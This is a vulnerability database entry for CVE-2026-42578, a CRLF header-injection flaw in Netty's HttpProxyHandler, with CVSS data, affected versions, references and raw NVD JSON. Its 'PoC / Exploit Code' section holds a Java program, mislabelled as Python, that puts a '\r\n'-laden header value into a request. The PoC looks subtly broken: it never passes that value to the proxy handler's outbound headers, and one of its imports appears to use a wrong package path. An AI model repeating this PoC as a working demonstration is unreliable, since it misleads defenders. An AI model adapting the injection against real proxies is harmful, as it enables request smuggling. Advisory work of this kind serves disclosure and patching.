CVE-2026-42578

Description

Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE

Netty < 4.2.13.Final

Netty < 4.1.133.Final

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import io.netty.bootstrap.Bootstrap;
import io.netty.channel.*;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioSocketChannel;
import io.netty.handler.codec.http.*;
import io.netty.handler.codec.http.proxy.HttpProxyHandler;
import io.netty.handler.proxy.ProxyHandler;
import java.net.InetSocketAddress;

public class NettyCRLFPoC {
    public static void main(String[] args) throws Exception {
        EventLoopGroup group = new NioEventLoopGroup();
        try {
            Bootstrap b = new Bootstrap();
            b.group(group)
             .channel(NioSocketChannel.class)
             .handler(new ChannelInitializer<SocketChannel>() {
                 @Override
                 protected void initChannel(SocketChannel ch) {
                     // Configure the proxy handler pointing to a malicious or test proxy
                     ProxyHandler proxyHandler = new HttpProxyHandler(new InetSocketAddress("proxy.example.com", 8080));
                     ch.pipeline().addLast(proxyHandler);
                     ch.pipeline().addLast(new SimpleChannelInboundHandler<HttpObject>() {
                         @Override
                         protected void channelRead0(ChannelHandlerContext ctx, HttpObject msg) {
                             System.out.println("Received response: " + msg);
                         }
                     });
                 }
             });

            Channel ch = b.connect("target.example.com", 80).sync().channel();

            // Prepare the request with CRLF injection in the header
            // The vulnerability allows injecting \r\n to split headers
            String injectedHeader = "test-value\r\nX-Injected-Header: malicious-content\r\n";
            
            HttpRequest request = new DefaultHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/");
            request.headers().set(HttpHeaderNames.HOST, "target.example.com");
            request.headers().set("User-Agent", "Netty-Client");
            
            // This header value will be passed to outboundHeaders without validation
            request.headers().set("X-Vulnerable-Header", injectedHeader);

            ch.writeAndFlush(request);
            ch.closeFuture().sync();
        } finally {
            group.shutdownGracefully();
        }
    }
}
/*
 * Explanation: 
 * This PoC demonstrates how an application using HttpProxyHandler might allow CRLF injection.
 * When the 'X-Vulnerable-Header' is processed by the vulnerable HttpProxyHandler,
 * the '\r\n' characters are not sanitized. This results in the CONNECT request sent
 * to the proxy containing additional headers ('X-Injected-Header'), which violates the
 * HTTP protocol structure and can lead to request smuggling or cache poisoning.
 */

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42578
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42578
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42578/
[4] VulDB https://vuldb.com/cve/CVE-2026-42578
[5] https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr
[6] https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42578", "sourceIdentifier": "[email protected]", "published": "2026-05-13T19:17:23.210", "lastModified": "2026-05-18T12:54:04.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-113"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.133", "matchCriteriaId": "DFE205A5-2C43-40C9-A2FF-CF6759B8D861"}, {"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.13", "matchCriteriaId": "D94A720F-9CED-4BE9-8C37-FD9E2FD28472"}]}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/netty/netty/security/advisories/GHSA-45q3-82m4-75jr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}